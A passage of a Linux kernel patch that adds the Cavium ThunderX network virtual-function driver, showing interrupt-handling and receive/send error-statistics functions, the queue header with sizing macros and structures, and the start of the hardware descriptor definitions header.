reg_val |= (1ULL << NICVF_INTR_PKT_DROP_SHIFT); + break; + case NICVF_INTR_TCP_TIMER: + reg_val |= (1ULL << NICVF_INTR_TCP_TIMER_SHIFT); + break; + case NICVF_INTR_MBOX: + reg_val |= (1ULL << NICVF_INTR_MBOX_SHIFT); + break; + case NICVF_INTR_QS_ERR: + reg_val |= (1ULL << NICVF_INTR_QS_ERR_SHIFT); + break; + default: + netdev_err(nic->netdev, + "Failed to disable interrupt: unknown type\n"); + break; + } + + nicvf_reg_write(nic, NIC_VF_ENA_W1C, reg_val); +} + +/* Clear interrupt */ +void nicvf_clear_intr(struct nicvf *nic, int int_type, int q_idx) +{ + u64 reg_val = 0; + + switch (int_type) { + case NICVF_INTR_CQ: + reg_val = ((1ULL << q_idx) << NICVF_INTR_CQ_SHIFT); + break; + case NICVF_INTR_SQ: + reg_val = ((1ULL << q_idx) << NICVF_INTR_SQ_SHIFT); + break; + case NICVF_INTR_RBDR: + reg_val = ((1ULL << q_idx) << NICVF_INTR_RBDR_SHIFT); + break; + case NICVF_INTR_PKT_DROP: + reg_val = (1ULL << NICVF_INTR_PKT_DROP_SHIFT); + break; + case NICVF_INTR_TCP_TIMER: + reg_val = (1ULL << NICVF_INTR_TCP_TIMER_SHIFT); + break; + case NICVF_INTR_MBOX: + reg_val = (1ULL << NICVF_INTR_MBOX_SHIFT); + break; + case NICVF_INTR_QS_ERR: + reg_val |= (1ULL << NICVF_INTR_QS_ERR_SHIFT); + break; + default: + netdev_err(nic->netdev, + "Failed to clear interrupt: unknown type\n"); + break; + } + + nicvf_reg_write(nic, NIC_VF_INT, reg_val); +} + +/* Check if interrupt is enabled */ +int nicvf_is_intr_enabled(struct nicvf *nic, int int_type, int q_idx) +{ + u64 reg_val; + u64 mask = 0xff; + + reg_val = nicvf_reg_read(nic, NIC_VF_ENA_W1S); + + switch (int_type) { + case NICVF_INTR_CQ: + mask = ((1ULL << q_idx) << NICVF_INTR_CQ_SHIFT); + break; + case NICVF_INTR_SQ: + mask = ((1ULL << q_idx) << NICVF_INTR_SQ_SHIFT); + break; + case NICVF_INTR_RBDR: + mask = ((1ULL << q_idx) << NICVF_INTR_RBDR_SHIFT); + break; + case NICVF_INTR_PKT_DROP: + mask = NICVF_INTR_PKT_DROP_MASK; + break; + case NICVF_INTR_TCP_TIMER: + mask = NICVF_INTR_TCP_TIMER_MASK; + break; + case NICVF_INTR_MBOX: + mask = NICVF_INTR_MBOX_MASK; + break; + case NICVF_INTR_QS_ERR: + mask = NICVF_INTR_QS_ERR_MASK; + break; + default: + netdev_err(nic->netdev, + "Failed to check interrupt enable: unknown type\n"); + break; + } + + return (reg_val & mask); +} + +void nicvf_update_rq_stats(struct nicvf *nic, int rq_idx) +{ + struct rcv_queue *rq; + +#define GET_RQ_STATS(reg) \ + nicvf_reg_read(nic, NIC_QSET_RQ_0_7_STAT_0_1 |\ + (rq_idx << NIC_Q_NUM_SHIFT) | (reg << 3)) + + rq = &nic->qs->rq[rq_idx]; + rq->stats.bytes = GET_RQ_STATS(RQ_SQ_STATS_OCTS); + rq->stats.pkts = GET_RQ_STATS(RQ_SQ_STATS_PKTS); +} + +void nicvf_update_sq_stats(struct nicvf *nic, int sq_idx) +{ + struct snd_queue *sq; + +#define GET_SQ_STATS(reg) \ + nicvf_reg_read(nic, 
NIC_QSET_SQ_0_7_STAT_0_1 |\ + (sq_idx << NIC_Q_NUM_SHIFT) | (reg << 3)) + + sq = &nic->qs->sq[sq_idx]; + sq->stats.bytes = GET_SQ_STATS(RQ_SQ_STATS_OCTS); + sq->stats.pkts = GET_SQ_STATS(RQ_SQ_STATS_PKTS); +} + +/* Check for errors in the receive cmp.queue entry */ +int nicvf_check_cqe_rx_errs(struct nicvf *nic, + struct cmp_queue *cq, struct cqe_rx_t *cqe_rx) +{ + struct cmp_queue_stats *stats = &cq->stats; + + if (!cqe_rx->err_level && !cqe_rx->err_opcode) { + stats->rx.errop.good++; + return 0; + } + + if (netif_msg_rx_err(nic)) + netdev_err(nic->netdev, + "%s: RX error CQE err_level 0x%x err_opcode 0x%x\n", + nic->netdev->name, + cqe_rx->err_level, cqe_rx->err_opcode); + + switch (cqe_rx->err_level) { + case CQ_ERRLVL_MAC: + stats->rx.errlvl.mac_errs++; + break; + case CQ_ERRLVL_L2: + stats->rx.errlvl.l2_errs++; + break; + case CQ_ERRLVL_L3: + stats->rx.errlvl.l3_errs++; + break; + case CQ_ERRLVL_L4: + stats->rx.errlvl.l4_errs++; + break; + } + + switch (cqe_rx->err_opcode) { + case CQ_RX_ERROP_RE_PARTIAL: + stats->rx.errop.partial_pkts++; + break; + case CQ_RX_ERROP_RE_JABBER: + stats->rx.errop.jabber_errs++; + break; + case CQ_RX_ERROP_RE_FCS: + stats->rx.errop.fcs_errs++; + break; + case CQ_RX_ERROP_RE_TERMINATE: + stats->rx.errop.terminate_errs++; + break; + case CQ_RX_ERROP_RE_RX_CTL: + stats->rx.errop.bgx_rx_errs++; + break; + case CQ_RX_ERROP_PREL2_ERR: + stats->rx.errop.prel2_errs++; + break; + case CQ_RX_ERROP_L2_FRAGMENT: + stats->rx.errop.l2_frags++; + break; + case CQ_RX_ERROP_L2_OVERRUN: + stats->rx.errop.l2_overruns++; + break; + case CQ_RX_ERROP_L2_PFCS: + stats->rx.errop.l2_pfcs++; + break; + case CQ_RX_ERROP_L2_PUNY: + stats->rx.errop.l2_puny++; + break; + case CQ_RX_ERROP_L2_MAL: + stats->rx.errop.l2_hdr_malformed++; + break; + case CQ_RX_ERROP_L2_OVERSIZE: + stats->rx.errop.l2_oversize++; + break; + case CQ_RX_ERROP_L2_UNDERSIZE: + stats->rx.errop.l2_undersize++; + break; + case CQ_RX_ERROP_L2_LENMISM: + stats->rx.errop.l2_len_mismatch++; + break; + case CQ_RX_ERROP_L2_PCLP: + stats->rx.errop.l2_pclp++; + break; + case CQ_RX_ERROP_IP_NOT: + stats->rx.errop.non_ip++; + break; + case CQ_RX_ERROP_IP_CSUM_ERR: + stats->rx.errop.ip_csum_err++; + break; + case CQ_RX_ERROP_IP_MAL: + stats->rx.errop.ip_hdr_malformed++; + break; + case CQ_RX_ERROP_IP_MALD: + stats->rx.errop.ip_payload_malformed++; + break; + case CQ_RX_ERROP_IP_HOP: + stats->rx.errop.ip_hop_errs++; + break; + case CQ_RX_ERROP_L3_ICRC: + stats->rx.errop.l3_icrc_errs++; + break; + case CQ_RX_ERROP_L3_PCLP: + stats->rx.errop.l3_pclp++; + break; + case CQ_RX_ERROP_L4_MAL: + stats->rx.errop.l4_malformed++; + break; + case CQ_RX_ERROP_L4_CHK: + stats->rx.errop.l4_csum_errs++; + break; + case CQ_RX_ERROP_UDP_LEN: + stats->rx.errop.udp_len_err++; + break; + case CQ_RX_ERROP_L4_PORT: + stats->rx.errop.bad_l4_port++; + break; + case CQ_RX_ERROP_TCP_FLAG: + stats->rx.errop.bad_tcp_flag++; + break; + case CQ_RX_ERROP_TCP_OFFSET: + stats->rx.errop.tcp_offset_errs++; + break; + case CQ_RX_ERROP_L4_PCLP: + stats->rx.errop.l4_pclp++; + break; + case CQ_RX_ERROP_RBDR_TRUNC: + stats->rx.errop.pkt_truncated++; + break; + } + + return 1; +} + +/* Check for errors in the send cmp.queue entry */ +int nicvf_check_cqe_tx_errs(struct nicvf *nic, + struct cmp_queue *cq, struct cqe_send_t *cqe_tx) +{ + struct cmp_queue_stats *stats = &cq->stats; + + switch (cqe_tx->send_status) { + case CQ_TX_ERROP_GOOD: + stats->tx.good++; + return 0; + case CQ_TX_ERROP_DESC_FAULT: + stats->tx.desc_fault++; + break; + case CQ_TX_ERROP_HDR_CONS_ERR: + 
stats->tx.hdr_cons_err++; + break; + case CQ_TX_ERROP_SUBDC_ERR: + stats->tx.subdesc_err++; + break; + case CQ_TX_ERROP_IMM_SIZE_OFLOW: + stats->tx.imm_size_oflow++; + break; + case CQ_TX_ERROP_DATA_SEQUENCE_ERR: + stats->tx.data_seq_err++; + break; + case CQ_TX_ERROP_MEM_SEQUENCE_ERR: + stats->tx.mem_seq_err++; + break; + case CQ_TX_ERROP_LOCK_VIOL: + stats->tx.lock_viol++; + break; + case CQ_TX_ERROP_DATA_FAULT: + stats->tx.data_fault++; + break; + case CQ_TX_ERROP_TSTMP_CONFLICT: + stats->tx.tstmp_conflict++; + break; + case CQ_TX_ERROP_TSTMP_TIMEOUT: + stats->tx.tstmp_timeout++; + break; + case CQ_TX_ERROP_MEM_FAULT: + stats->tx.mem_fault++; + break; + case CQ_TX_ERROP_CK_OVERLAP: + stats->tx.csum_overlap++; + break; + case CQ_TX_ERROP_CK_OFLOW: + stats->tx.csum_overflow++; + break; + } + + return 1; +} diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.h b/drivers/net/ethernet/cavium/thunder/nicvf_queues.h new file mode 100644 index 000000000000..8341bdf755d1 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.h @@ -0,0 +1,381 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#ifndef NICVF_QUEUES_H +#define NICVF_QUEUES_H + +#include +#include "q_struct.h" + +#define MAX_QUEUE_SET 128 +#define MAX_RCV_QUEUES_PER_QS 8 +#define MAX_RCV_BUF_DESC_RINGS_PER_QS 2 +#define MAX_SND_QUEUES_PER_QS 8 +#define MAX_CMP_QUEUES_PER_QS 8 + +/* VF's queue interrupt ranges */ +#define NICVF_INTR_ID_CQ 0 +#define NICVF_INTR_ID_SQ 8 +#define NICVF_INTR_ID_RBDR 16 +#define NICVF_INTR_ID_MISC 18 +#define NICVF_INTR_ID_QS_ERR 19 + +#define for_each_cq_irq(irq) \ + for (irq = NICVF_INTR_ID_CQ; irq < NICVF_INTR_ID_SQ; irq++) +#define for_each_sq_irq(irq) \ + for (irq = NICVF_INTR_ID_SQ; irq < NICVF_INTR_ID_RBDR; irq++) +#define for_each_rbdr_irq(irq) \ + for (irq = NICVF_INTR_ID_RBDR; irq < NICVF_INTR_ID_MISC; irq++) + +#define RBDR_SIZE0 0ULL /* 8K entries */ +#define RBDR_SIZE1 1ULL /* 16K entries */ +#define RBDR_SIZE2 2ULL /* 32K entries */ +#define RBDR_SIZE3 3ULL /* 64K entries */ +#define RBDR_SIZE4 4ULL /* 126K entries */ +#define RBDR_SIZE5 5ULL /* 256K entries */ +#define RBDR_SIZE6 6ULL /* 512K entries */ + +#define SND_QUEUE_SIZE0 0ULL /* 1K entries */ +#define SND_QUEUE_SIZE1 1ULL /* 2K entries */ +#define SND_QUEUE_SIZE2 2ULL /* 4K entries */ +#define SND_QUEUE_SIZE3 3ULL /* 8K entries */ +#define SND_QUEUE_SIZE4 4ULL /* 16K entries */ +#define SND_QUEUE_SIZE5 5ULL /* 32K entries */ +#define SND_QUEUE_SIZE6 6ULL /* 64K entries */ + +#define CMP_QUEUE_SIZE0 0ULL /* 1K entries */ +#define CMP_QUEUE_SIZE1 1ULL /* 2K entries */ +#define CMP_QUEUE_SIZE2 2ULL /* 4K entries */ +#define CMP_QUEUE_SIZE3 3ULL /* 8K entries */ +#define CMP_QUEUE_SIZE4 4ULL /* 16K entries */ +#define CMP_QUEUE_SIZE5 5ULL /* 32K entries */ +#define CMP_QUEUE_SIZE6 6ULL /* 64K entries */ + +/* Default queue count per QS, its lengths and threshold values */ +#define RBDR_CNT 1 +#define RCV_QUEUE_CNT 8 +#define SND_QUEUE_CNT 8 +#define CMP_QUEUE_CNT 8 /* Max of RCV and SND qcount */ + +#define SND_QSIZE SND_QUEUE_SIZE4 +#define SND_QUEUE_LEN (1ULL << (SND_QSIZE + 10)) +#define MAX_SND_QUEUE_LEN (1ULL << (SND_QUEUE_SIZE6 + 10)) +#define SND_QUEUE_THRESH 2ULL +#define MIN_SQ_DESC_PER_PKT_XMIT 2 +/* Since timestamp not enabled, otherwise 2 */ +#define MAX_CQE_PER_PKT_XMIT 1 + +#define CMP_QSIZE 
CMP_QUEUE_SIZE4 +#define CMP_QUEUE_LEN (1ULL << (CMP_QSIZE + 10)) +#define CMP_QUEUE_CQE_THRESH 0 +#define CMP_QUEUE_TIMER_THRESH 220 /* 10usec */ + +#define RBDR_SIZE RBDR_SIZE0 +#define RCV_BUF_COUNT (1ULL << (RBDR_SIZE + 13)) +#define MAX_RCV_BUF_COUNT (1ULL << (RBDR_SIZE6 + 13)) +#define RBDR_THRESH (RCV_BUF_COUNT / 2) +#define DMA_BUFFER_LEN 2048 /* In multiples of 128bytes */ +#define RCV_FRAG_LEN (SKB_DATA_ALIGN(DMA_BUFFER_LEN + NET_SKB_PAD) + \ + SKB_DATA_ALIGN(sizeof(struct skb_shared_info)) + \ + (NICVF_RCV_BUF_ALIGN_BYTES * 2)) +#define RCV_DATA_OFFSET NICVF_RCV_BUF_ALIGN_BYTES + +#define MAX_CQES_FOR_TX ((SND_QUEUE_LEN / MIN_SQ_DESC_PER_PKT_XMIT) * \ + MAX_CQE_PER_PKT_XMIT) +#define RQ_CQ_DROP ((CMP_QUEUE_LEN - MAX_CQES_FOR_TX) / 256) + +/* Descriptor size in bytes */ +#define SND_QUEUE_DESC_SIZE 16 +#define CMP_QUEUE_DESC_SIZE 512 + +/* Buffer / descriptor alignments */ +#define NICVF_RCV_BUF_ALIGN 7 +#define NICVF_RCV_BUF_ALIGN_BYTES (1ULL << NICVF_RCV_BUF_ALIGN) +#define NICVF_CQ_BASE_ALIGN_BYTES 512 /* 9 bits */ +#define NICVF_SQ_BASE_ALIGN_BYTES 128 /* 7 bits */ + +#define NICVF_ALIGNED_ADDR(ADDR, ALIGN_BYTES) ALIGN(ADDR, ALIGN_BYTES) +#define NICVF_ADDR_ALIGN_LEN(ADDR, BYTES)\ + (NICVF_ALIGNED_ADDR(ADDR, BYTES) - BYTES) +#define NICVF_RCV_BUF_ALIGN_LEN(X)\ + (NICVF_ALIGNED_ADDR(X, NICVF_RCV_BUF_ALIGN_BYTES) - X) + +/* Queue enable/disable */ +#define NICVF_SQ_EN BIT_ULL(19) + +/* Queue reset */ +#define NICVF_CQ_RESET BIT_ULL(41) +#define NICVF_SQ_RESET BIT_ULL(17) +#define NICVF_RBDR_RESET BIT_ULL(43) + +enum CQ_RX_ERRLVL_E { + CQ_ERRLVL_MAC, + CQ_ERRLVL_L2, + CQ_ERRLVL_L3, + CQ_ERRLVL_L4, +}; + +enum CQ_RX_ERROP_E { + CQ_RX_ERROP_RE_NONE = 0x0, + CQ_RX_ERROP_RE_PARTIAL = 0x1, + CQ_RX_ERROP_RE_JABBER = 0x2, + CQ_RX_ERROP_RE_FCS = 0x7, + CQ_RX_ERROP_RE_TERMINATE = 0x9, + CQ_RX_ERROP_RE_RX_CTL = 0xb, + CQ_RX_ERROP_PREL2_ERR = 0x1f, + CQ_RX_ERROP_L2_FRAGMENT = 0x20, + CQ_RX_ERROP_L2_OVERRUN = 0x21, + CQ_RX_ERROP_L2_PFCS = 0x22, + CQ_RX_ERROP_L2_PUNY = 0x23, + CQ_RX_ERROP_L2_MAL = 0x24, + CQ_RX_ERROP_L2_OVERSIZE = 0x25, + CQ_RX_ERROP_L2_UNDERSIZE = 0x26, + CQ_RX_ERROP_L2_LENMISM = 0x27, + CQ_RX_ERROP_L2_PCLP = 0x28, + CQ_RX_ERROP_IP_NOT = 0x41, + CQ_RX_ERROP_IP_CSUM_ERR = 0x42, + CQ_RX_ERROP_IP_MAL = 0x43, + CQ_RX_ERROP_IP_MALD = 0x44, + CQ_RX_ERROP_IP_HOP = 0x45, + CQ_RX_ERROP_L3_ICRC = 0x46, + CQ_RX_ERROP_L3_PCLP = 0x47, + CQ_RX_ERROP_L4_MAL = 0x61, + CQ_RX_ERROP_L4_CHK = 0x62, + CQ_RX_ERROP_UDP_LEN = 0x63, + CQ_RX_ERROP_L4_PORT = 0x64, + CQ_RX_ERROP_TCP_FLAG = 0x65, + CQ_RX_ERROP_TCP_OFFSET = 0x66, + CQ_RX_ERROP_L4_PCLP = 0x67, + CQ_RX_ERROP_RBDR_TRUNC = 0x70, +}; + +enum CQ_TX_ERROP_E { + CQ_TX_ERROP_GOOD = 0x0, + CQ_TX_ERROP_DESC_FAULT = 0x10, + CQ_TX_ERROP_HDR_CONS_ERR = 0x11, + CQ_TX_ERROP_SUBDC_ERR = 0x12, + CQ_TX_ERROP_IMM_SIZE_OFLOW = 0x80, + CQ_TX_ERROP_DATA_SEQUENCE_ERR = 0x81, + CQ_TX_ERROP_MEM_SEQUENCE_ERR = 0x82, + CQ_TX_ERROP_LOCK_VIOL = 0x83, + CQ_TX_ERROP_DATA_FAULT = 0x84, + CQ_TX_ERROP_TSTMP_CONFLICT = 0x85, + CQ_TX_ERROP_TSTMP_TIMEOUT = 0x86, + CQ_TX_ERROP_MEM_FAULT = 0x87, + CQ_TX_ERROP_CK_OVERLAP = 0x88, + CQ_TX_ERROP_CK_OFLOW = 0x89, + CQ_TX_ERROP_ENUM_LAST = 0x8a, +}; + +struct cmp_queue_stats { + struct rx_stats { + struct { + u64 mac_errs; + u64 l2_errs; + u64 l3_errs; + u64 l4_errs; + } errlvl; + struct { + u64 good; + u64 partial_pkts; + u64 jabber_errs; + u64 fcs_errs; + u64 terminate_errs; + u64 bgx_rx_errs; + u64 prel2_errs; + u64 l2_frags; + u64 l2_overruns; + u64 l2_pfcs; + u64 l2_puny; + u64 l2_hdr_malformed; + u64 l2_oversize; + u64 
l2_undersize; + u64 l2_len_mismatch; + u64 l2_pclp; + u64 non_ip; + u64 ip_csum_err; + u64 ip_hdr_malformed; + u64 ip_payload_malformed; + u64 ip_hop_errs; + u64 l3_icrc_errs; + u64 l3_pclp; + u64 l4_malformed; + u64 l4_csum_errs; + u64 udp_len_err; + u64 bad_l4_port; + u64 bad_tcp_flag; + u64 tcp_offset_errs; + u64 l4_pclp; + u64 pkt_truncated; + } errop; + } rx; + struct tx_stats { + u64 good; + u64 desc_fault; + u64 hdr_cons_err; + u64 subdesc_err; + u64 imm_size_oflow; + u64 data_seq_err; + u64 mem_seq_err; + u64 lock_viol; + u64 data_fault; + u64 tstmp_conflict; + u64 tstmp_timeout; + u64 mem_fault; + u64 csum_overlap; + u64 csum_overflow; + } tx; +} ____cacheline_aligned_in_smp; + +enum RQ_SQ_STATS { + RQ_SQ_STATS_OCTS, + RQ_SQ_STATS_PKTS, +}; + +struct rx_tx_queue_stats { + u64 bytes; + u64 pkts; +} ____cacheline_aligned_in_smp; + +struct q_desc_mem { + dma_addr_t dma; + u64 size; + u16 q_len; + dma_addr_t phys_base; + void *base; + void *unalign_base; +}; + +struct rbdr { + bool enable; + u32 dma_size; + u32 frag_len; + u32 thresh; /* Threshold level for interrupt */ + void *desc; + u32 head; + u32 tail; + struct q_desc_mem dmem; +} ____cacheline_aligned_in_smp; + +struct rcv_queue { + bool enable; + struct rbdr *rbdr_start; + struct rbdr *rbdr_cont; + bool en_tcp_reassembly; + u8 cq_qs; /* CQ's QS to which this RQ is assigned */ + u8 cq_idx; /* CQ index (0 to 7) in the QS */ + u8 cont_rbdr_qs; /* Continue buffer ptrs - QS num */ + u8 cont_qs_rbdr_idx; /* RBDR idx in the cont QS */ + u8 start_rbdr_qs; /* First buffer ptrs - QS num */ + u8 start_qs_rbdr_idx; /* RBDR idx in the above QS */ + u8 caching; + struct rx_tx_queue_stats stats; +} ____cacheline_aligned_in_smp; + +struct cmp_queue { + bool enable; + u16 thresh; + spinlock_t lock; /* lock to serialize processing CQEs */ + void *desc; + struct q_desc_mem dmem; + struct cmp_queue_stats stats; +} ____cacheline_aligned_in_smp; + +struct snd_queue { + bool enable; + u8 cq_qs; /* CQ's QS to which this SQ is pointing */ + u8 cq_idx; /* CQ index (0 to 7) in the above QS */ + u16 thresh; + atomic_t free_cnt; + u32 head; + u32 tail; + u64 *skbuff; + void *desc; + +#define TSO_HEADER_SIZE 128 + /* For TSO segment's header */ + char *tso_hdrs; + dma_addr_t tso_hdrs_phys; + + cpumask_t affinity_mask; + struct q_desc_mem dmem; + struct rx_tx_queue_stats stats; +} ____cacheline_aligned_in_smp; + +struct queue_set { + bool enable; + bool be_en; + u8 vnic_id; + u8 rq_cnt; + u8 cq_cnt; + u64 cq_len; + u8 sq_cnt; + u64 sq_len; + u8 rbdr_cnt; + u64 rbdr_len; + struct rcv_queue rq[MAX_RCV_QUEUES_PER_QS]; + struct cmp_queue cq[MAX_CMP_QUEUES_PER_QS]; + struct snd_queue sq[MAX_SND_QUEUES_PER_QS]; + struct rbdr rbdr[MAX_RCV_BUF_DESC_RINGS_PER_QS]; +} ____cacheline_aligned_in_smp; + +#define GET_RBDR_DESC(RING, idx)\ + (&(((struct rbdr_entry_t *)((RING)->desc))[idx])) +#define GET_SQ_DESC(RING, idx)\ + (&(((struct sq_hdr_subdesc *)((RING)->desc))[idx])) +#define GET_CQ_DESC(RING, idx)\ + (&(((union cq_desc_t *)((RING)->desc))[idx])) + +/* CQ status bits */ +#define CQ_WR_FULL BIT(26) +#define CQ_WR_DISABLE BIT(25) +#define CQ_WR_FAULT BIT(24) +#define CQ_CQE_COUNT (0xFFFF << 0) + +#define CQ_ERR_MASK (CQ_WR_FULL | CQ_WR_DISABLE | CQ_WR_FAULT) + +int nicvf_set_qset_resources(struct nicvf *nic); +int nicvf_config_data_transfer(struct nicvf *nic, bool enable); +void nicvf_qset_config(struct nicvf *nic, bool enable); +void nicvf_cmp_queue_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable); + +void nicvf_sq_enable(struct nicvf *nic, 
struct snd_queue *sq, int qidx); +void nicvf_sq_disable(struct nicvf *nic, int qidx); +void nicvf_put_sq_desc(struct snd_queue *sq, int desc_cnt); +void nicvf_sq_free_used_descs(struct net_device *netdev, + struct snd_queue *sq, int qidx); +int nicvf_sq_append_skb(struct nicvf *nic, struct sk_buff *skb); + +struct sk_buff *nicvf_get_rcv_skb(struct nicvf *nic, struct cqe_rx_t *cqe_rx); +void nicvf_rbdr_task(unsigned long data); +void nicvf_rbdr_work(struct work_struct *work); + +void nicvf_enable_intr(struct nicvf *nic, int int_type, int q_idx); +void nicvf_disable_intr(struct nicvf *nic, int int_type, int q_idx); +void nicvf_clear_intr(struct nicvf *nic, int int_type, int q_idx); +int nicvf_is_intr_enabled(struct nicvf *nic, int int_type, int q_idx); + +/* Register access APIs */ +void nicvf_reg_write(struct nicvf *nic, u64 offset, u64 val); +u64 nicvf_reg_read(struct nicvf *nic, u64 offset); +void nicvf_qset_reg_write(struct nicvf *nic, u64 offset, u64 val); +u64 nicvf_qset_reg_read(struct nicvf *nic, u64 offset); +void nicvf_queue_reg_write(struct nicvf *nic, u64 offset, + u64 qidx, u64 val); +u64 nicvf_queue_reg_read(struct nicvf *nic, + u64 offset, u64 qidx); + +/* Stats */ +void nicvf_update_rq_stats(struct nicvf *nic, int rq_idx); +void nicvf_update_sq_stats(struct nicvf *nic, int sq_idx); +int nicvf_check_cqe_rx_errs(struct nicvf *nic, + struct cmp_queue *cq, struct cqe_rx_t *cqe_rx); +int nicvf_check_cqe_tx_errs(struct nicvf *nic, + struct cmp_queue *cq, struct cqe_send_t *cqe_tx); +#endif /* NICVF_QUEUES_H */ diff --git a/drivers/net/ethernet/cavium/thunder/q_struct.h b/drivers/net/ethernet/cavium/thunder/q_struct.h new file mode 100644 index 000000000000..3c1de97b1add --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/q_struct.h @@ -0,0 +1,701 @@ +/* + * This file contains HW queue descriptor formats, config register + * structures etc + * + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#ifndef Q_STRUCT_H +#define Q_STRUCT_H + +/* Load transaction types for reading segment bytes specified by + * NIC_SEND_GATHER_S[LD_TYPE]. 
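+ * The driver uses LDWB for all of its gather subdescriptors
+ * (see nicvf_sq_add_gather_subdesc()).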
+ */ +enum nic_send_ld_type_e { + NIC_SEND_LD_TYPE_E_LDD = 0x0, + NIC_SEND_LD_TYPE_E_LDT = 0x1, + NIC_SEND_LD_TYPE_E_LDWB = 0x2, + NIC_SEND_LD_TYPE_E_ENUM_LAST = 0x3, +}; + +enum ether_type_algorithm { + ETYPE_ALG_NONE = 0x0, + ETYPE_ALG_SKIP = 0x1, + ETYPE_ALG_ENDPARSE = 0x2, + ETYPE_ALG_VLAN = 0x3, + ETYPE_ALG_VLAN_STRIP = 0x4, +}; + +enum layer3_type { + L3TYPE_NONE = 0x00, + L3TYPE_GRH = 0x01, + L3TYPE_IPV4 = 0x04, + L3TYPE_IPV4_OPTIONS = 0x05, + L3TYPE_IPV6 = 0x06, + L3TYPE_IPV6_OPTIONS = 0x07, + L3TYPE_ET_STOP = 0x0D, + L3TYPE_OTHER = 0x0E, +}; + +enum layer4_type { + L4TYPE_NONE = 0x00, + L4TYPE_IPSEC_ESP = 0x01, + L4TYPE_IPFRAG = 0x02, + L4TYPE_IPCOMP = 0x03, + L4TYPE_TCP = 0x04, + L4TYPE_UDP = 0x05, + L4TYPE_SCTP = 0x06, + L4TYPE_GRE = 0x07, + L4TYPE_ROCE_BTH = 0x08, + L4TYPE_OTHER = 0x0E, +}; + +/* CPI and RSSI configuration */ +enum cpi_algorithm_type { + CPI_ALG_NONE = 0x0, + CPI_ALG_VLAN = 0x1, + CPI_ALG_VLAN16 = 0x2, + CPI_ALG_DIFF = 0x3, +}; + +enum rss_algorithm_type { + RSS_ALG_NONE = 0x00, + RSS_ALG_PORT = 0x01, + RSS_ALG_IP = 0x02, + RSS_ALG_TCP_IP = 0x03, + RSS_ALG_UDP_IP = 0x04, + RSS_ALG_SCTP_IP = 0x05, + RSS_ALG_GRE_IP = 0x06, + RSS_ALG_ROCE = 0x07, +}; + +enum rss_hash_cfg { + RSS_HASH_L2ETC = 0x00, + RSS_HASH_IP = 0x01, + RSS_HASH_TCP = 0x02, + RSS_HASH_TCP_SYN_DIS = 0x03, + RSS_HASH_UDP = 0x04, + RSS_HASH_L4ETC = 0x05, + RSS_HASH_ROCE = 0x06, + RSS_L3_BIDI = 0x07, + RSS_L4_BIDI = 0x08, +}; + +/* Completion queue entry types */ +enum cqe_type { + CQE_TYPE_INVALID = 0x0, + CQE_TYPE_RX = 0x2, + CQE_TYPE_RX_SPLIT = 0x3, + CQE_TYPE_RX_TCP = 0x4, + CQE_TYPE_SEND = 0x8, + CQE_TYPE_SEND_PTP = 0x9, +}; + +enum cqe_rx_tcp_status { + CQE_RX_STATUS_VALID_TCP_CNXT = 0x00, + CQE_RX_STATUS_INVALID_TCP_CNXT = 0x0F, +}; + +enum cqe_send_status { + CQE_SEND_STATUS_GOOD = 0x00, + CQE_SEND_STATUS_DESC_FAULT = 0x01, + CQE_SEND_STATUS_HDR_CONS_ERR = 0x11, + CQE_SEND_STATUS_SUBDESC_ERR = 0x12, + CQE_SEND_STATUS_IMM_SIZE_OFLOW = 0x80, + CQE_SEND_STATUS_CRC_SEQ_ERR = 0x81, + CQE_SEND_STATUS_DATA_SEQ_ERR = 0x82, + CQE_SEND_STATUS_MEM_SEQ_ERR = 0x83, + CQE_SEND_STATUS_LOCK_VIOL = 0x84, + CQE_SEND_STATUS_LOCK_UFLOW = 0x85, + CQE_SEND_STATUS_DATA_FAULT = 0x86, + CQE_SEND_STATUS_TSTMP_CONFLICT = 0x87, + CQE_SEND_STATUS_TSTMP_TIMEOUT = 0x88, + CQE_SEND_STATUS_MEM_FAULT = 0x89, + CQE_SEND_STATUS_CSUM_OVERLAP = 0x8A, + CQE_SEND_STATUS_CSUM_OVERFLOW = 0x8B, +}; + +enum cqe_rx_tcp_end_reason { + CQE_RX_TCP_END_FIN_FLAG_DET = 0, + CQE_RX_TCP_END_INVALID_FLAG = 1, + CQE_RX_TCP_END_TIMEOUT = 2, + CQE_RX_TCP_END_OUT_OF_SEQ = 3, + CQE_RX_TCP_END_PKT_ERR = 4, + CQE_RX_TCP_END_QS_DISABLED = 0x0F, +}; + +/* Packet protocol level error enumeration */ +enum cqe_rx_err_level { + CQE_RX_ERRLVL_RE = 0x0, + CQE_RX_ERRLVL_L2 = 0x1, + CQE_RX_ERRLVL_L3 = 0x2, + CQE_RX_ERRLVL_L4 = 0x3, +}; + +/* Packet protocol level error type enumeration */ +enum cqe_rx_err_opcode { + CQE_RX_ERR_RE_NONE = 0x0, + CQE_RX_ERR_RE_PARTIAL = 0x1, + CQE_RX_ERR_RE_JABBER = 0x2, + CQE_RX_ERR_RE_FCS = 0x7, + CQE_RX_ERR_RE_TERMINATE = 0x9, + CQE_RX_ERR_RE_RX_CTL = 0xb, + CQE_RX_ERR_PREL2_ERR = 0x1f, + CQE_RX_ERR_L2_FRAGMENT = 0x20, + CQE_RX_ERR_L2_OVERRUN = 0x21, + CQE_RX_ERR_L2_PFCS = 0x22, + CQE_RX_ERR_L2_PUNY = 0x23, + CQE_RX_ERR_L2_MAL = 0x24, + CQE_RX_ERR_L2_OVERSIZE = 0x25, + CQE_RX_ERR_L2_UNDERSIZE = 0x26, + CQE_RX_ERR_L2_LENMISM = 0x27, + CQE_RX_ERR_L2_PCLP = 0x28, + CQE_RX_ERR_IP_NOT = 0x41, + CQE_RX_ERR_IP_CHK = 0x42, + CQE_RX_ERR_IP_MAL = 0x43, + CQE_RX_ERR_IP_MALD = 0x44, + CQE_RX_ERR_IP_HOP = 0x45, + CQE_RX_ERR_L3_ICRC = 0x46, + 
